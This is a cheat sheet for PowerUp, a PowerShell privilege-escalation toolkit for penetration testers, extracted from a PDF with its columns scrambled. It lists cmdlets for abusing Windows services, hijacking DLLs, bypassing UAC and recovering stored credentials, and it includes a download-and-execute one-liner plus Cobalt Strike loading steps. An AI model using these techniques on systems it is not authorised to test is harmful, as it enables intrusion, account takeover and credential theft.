PowerUp Cheat Sheet Weaponizing Service Vulnerabilities Registry Checks

Invoke-ServiceAbuse abuses a vulnerable service’s Get- Checks if the

binPath to execute commands as SYSTEM. RegistryAlwaysInstall "AlwaysInstallElevated" key
Install-ServiceBinary installs a malicious C# binary for a Elevated is set. This means that MSI
specified service. installation packages always
run as SYSTEM.
Both cmdlets accept the following parameters (as well as
Get- Returns any autologon
Getting Started accepting a service names/service object from Get-
RegistryAutoLogon credentials from various
Note: PowerUp’s ‘bleeding edge’ will always in be the Service on the pipeline):
registry locations.
development branch of PowerSploit. Service name to abuse. -Name SERVICE
Get- Returns autoruns where the
Get PowerUp: http://bit.ly/1PdjSHk The username to add -UserName ModifiableRegistryAu current user can modify the
Load from disk: 1) C:\> powershell –exec bypass 2) PS (defaults to ‘john’). Domain ‘[DOMAIN\]USER’ toRun binary/script (or its config).
C:\> Import-Module PowerUp.ps1 users are not created, only
added to the LocalGroup. Miscellaneous Checks
Load from GitHub: PS C:\> IEX (New-Object Get- Checks for leftover
Net.WebClient).DownloadString("http://bit.ly/1PdjSHk") The password for the added -Password
user (defaults to ‘P@55Word’ UnattendedInstallFile unattend.xml files.
Load in Cobalt Strike’s Beacon: beacon> powershell- Get-Webconfig Recovers cleartext and
‘Password123!’).
import /local/path/to/PowerUp.ps1 , then beacon> encrypted connection
powershell Invoke-AllChecks The group to add the user to -LocalGroup “NAME”
(default: ‘Administrators’). strings from all web.configs.
Getting help: PS C:\> Get-Help Cmdlet-Name [-detailed] [- Credit to Scott Sutherland.
full] Custom command to execute. -Command “net…”
Get- Returns all privileges for the
Most PowerUp functions are implemented in Empire in Install-ServiceBinary backs up the original service path to ProcessTokenPrivilege current (or specified)
privesc/powerup/* \orig_path.exe.bak. Restore-ServiceBinary will restore process.
this backup binary to its original path.
Invoke-PrivescAudit (old Invoke-AllChecks) will run all Get-SiteListPassword Searches for any McAfee
current privilege escalation checks detailed in this guide Set-ServiceBinPath can set a service’s binPath without SiteList.xml files and
and will output the appropriate abuse function syntax for caling sc.exe. decrypts the contents.
anything found. The –HTMLReport flag will write out a DLL Hijacking Helpers
HTML version of the report to SYSTEM.username.html. Find-PathDLLHijack checks if the current %PATH% has Enable-Privilege Enables a specific privilege
Enumerating Service Vulnerabilities any directories that are writeable by the current user. for the current process.
Get-ModifiableService Enumerates all services Weaponizable for Windows 7 with Write-HijackDll and Available privileges can be
where the current user can ‘FOLDER\PATH\wlbsctrl.dll’. found with Get-
modify the service binPath. Write-HijackDll writes out a self-deleting .bat file to ProcessTokenPrivilege.
Get- Enumerates all services \hijackpath\debug.bat that executes a command, and Get- Returns all SIDs that the
ModifiableServiceFile where the current user can writes out a hijackable DLL that launches the .bat. It CurrentUserTokenGro current user is a part of even
write to the associated accepts the same -UserName/-Password/-Command upSid if the SID is disabled.
service binary or its arguments as Invoke-ServiceAbuse as well as:
Invoke- Bypasses UAC by performing
arguments. Path to write the hijack -DllPath EventVwrBypass an image hijack on the .msc
Get-ServiceUnquoted Enumerates all services w/ DLL PATH\wlbsctrl.dll file extension.
unquoted binary paths. Manual arch specification. -Architecture [x64/x86]
More Information
Path of the .bat for the -BatPath PATH\y.bat http://www.harmj0y.net/blog/
hijackable .dll to run.

Version 1.2. Created by Will Schroeder (@harmj0y) and released under the Creative Commons v3 "Attribution" License.